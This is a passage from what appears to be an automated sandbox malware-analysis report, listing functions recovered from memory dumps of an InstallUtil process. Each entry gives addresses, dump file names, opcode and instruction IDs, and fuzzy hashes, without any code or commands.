                                              • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                              • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                              • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                              Function 04EA7D60 Relevance: .0, Instructions: 7COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2417119026.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4ea0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                              • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                                              • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                              • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                                              Function 04EAA7E0 Relevance: .0, Instructions: 7COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2417119026.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4ea0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                              • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                                              • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                              • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                                              Function 04DAD9DF Relevance: .0, Instructions: 7COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2416891437.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4da0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 347cdbfa173713432701123336160b4d2a7267b4ba022e39a39826d4c2bbd340
                                              • Instruction ID: 696cbfe5d15af7d2593f5b6caf9ac7a36a60402c0010a3af3382382b00401476
                                              • Opcode Fuzzy Hash: 347cdbfa173713432701123336160b4d2a7267b4ba022e39a39826d4c2bbd340
                                              • Instruction Fuzzy Hash: 1DB09277A00008868A00D688E4018DCFB30DB94232F000037C20462000572025668660
                                              Function 04EA8CC8 Relevance: .0, Instructions: 6COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2417119026.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4ea0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 305fc7ee1548bfe5911c53538772243976c585bd811631a57acb259c5d461878
                                              • Instruction ID: 3a6ab80f03f14702570fad715a0eaf4cc41669ef0d9ef2f7c38899a0086c923c
                                              • Opcode Fuzzy Hash: 305fc7ee1548bfe5911c53538772243976c585bd811631a57acb259c5d461878
                                              • Instruction Fuzzy Hash: 52B09239200000ABC204CB40C990C15F7A2EFD8308B28C49DA90D4B252CB33EC13EB00
                                              Function 04F13EC0 Relevance: .0, Instructions: 6COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2417319539.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4f10000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 25adaf30845da40c7d66f22038bfdc147b8a915def8a1f4d5a1eeab3e2c318ed
                                              • Instruction ID: 491015224e2925757c216b4a11f9de5ce1fa2f27900546bc0af3dac397a629ab
                                              • Opcode Fuzzy Hash: 25adaf30845da40c7d66f22038bfdc147b8a915def8a1f4d5a1eeab3e2c318ed
                                              • Instruction Fuzzy Hash: 1FA0223008AB0C8A820232F02C02020338C0A0230CB8000B8A20C08E220833E0A0A088
                                              Function 04F11886 Relevance: .0, Instructions: 6COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2417319539.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4f10000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 599a18f262953c39b69cc6d4f788fb607350fa515cb72e52fff0f0178f9f0e06
                                              • Instruction ID: d04d7dab9be4bcabf5b2d597ce19a08c8f0c546b815ceac41a5fc17e8cd23425
                                              • Opcode Fuzzy Hash: 599a18f262953c39b69cc6d4f788fb607350fa515cb72e52fff0f0178f9f0e06
                                              • Instruction Fuzzy Hash: 01C09B35D04515CBD721E720DC5565C3726A740305F019561940A1F75EDF742D46CB41
                                              Function 04F142F0 Relevance: .0, Instructions: 5COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2417319539.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4f10000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c4034314bd0516e9eaecbf5cec3122f467b301a5cf06cd3b41abdac27b979af7
                                              • Instruction ID: 856344166e89abdecf54d29871a85857fffe1dbbe658d092fd777279e5c27d55
                                              • Opcode Fuzzy Hash: c4034314bd0516e9eaecbf5cec3122f467b301a5cf06cd3b41abdac27b979af7
                                              • Instruction Fuzzy Hash: 9490223020020CCB02002BA03008000330CC0080003800000E20C002008A08A80000A8
                                              Function 04EA5770 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2417119026.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4ea0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 85a2bab2aec59e83881633edad00cb291da37f5c6792ab26e089569ae9f7d220
                                              • Instruction ID: 45e26ab85b0fb9280374e95fa488af440e4efa4abe77ca241b7f8adb27d7cd01
                                              • Opcode Fuzzy Hash: 85a2bab2aec59e83881633edad00cb291da37f5c6792ab26e089569ae9f7d220
                                              • Instruction Fuzzy Hash: 2DA002B6A48200ABDA429B929B19F4BFA61EFA9B53F018515F34E4409887754820EB66
                                              Function 04F19250 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2417319539.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4f10000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e370fb62ee51ac58e5e078020dad0059baef8293b9956ec957388a3dc9cadf5b
                                              • Instruction ID: 0513f32f78bf972b53030050674b302cdf2993bf1757ef0fce9acb10ef163f64
                                              • Opcode Fuzzy Hash: e370fb62ee51ac58e5e078020dad0059baef8293b9956ec957388a3dc9cadf5b
                                              • Instruction Fuzzy Hash: C7A02230808000EFCB028B00EA0EC0EBB22EBE0300B00C03CF000C203CCBB02C20EE20
                                              Function 04DAE2F0 Relevance: .0, Instructions: 2COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2416891437.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4da0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 83f3755b0985246e2b8724c42c85e7d218270f841ebeeb1627f36ba683f4be1f
                                              • Instruction ID: 7ab06147878bcd354274a4829a762980d9928e60e4accfa3e04ebae45f6a1251
                                              • Opcode Fuzzy Hash: 83f3755b0985246e2b8724c42c85e7d218270f841ebeeb1627f36ba683f4be1f
                                              • Instruction Fuzzy Hash: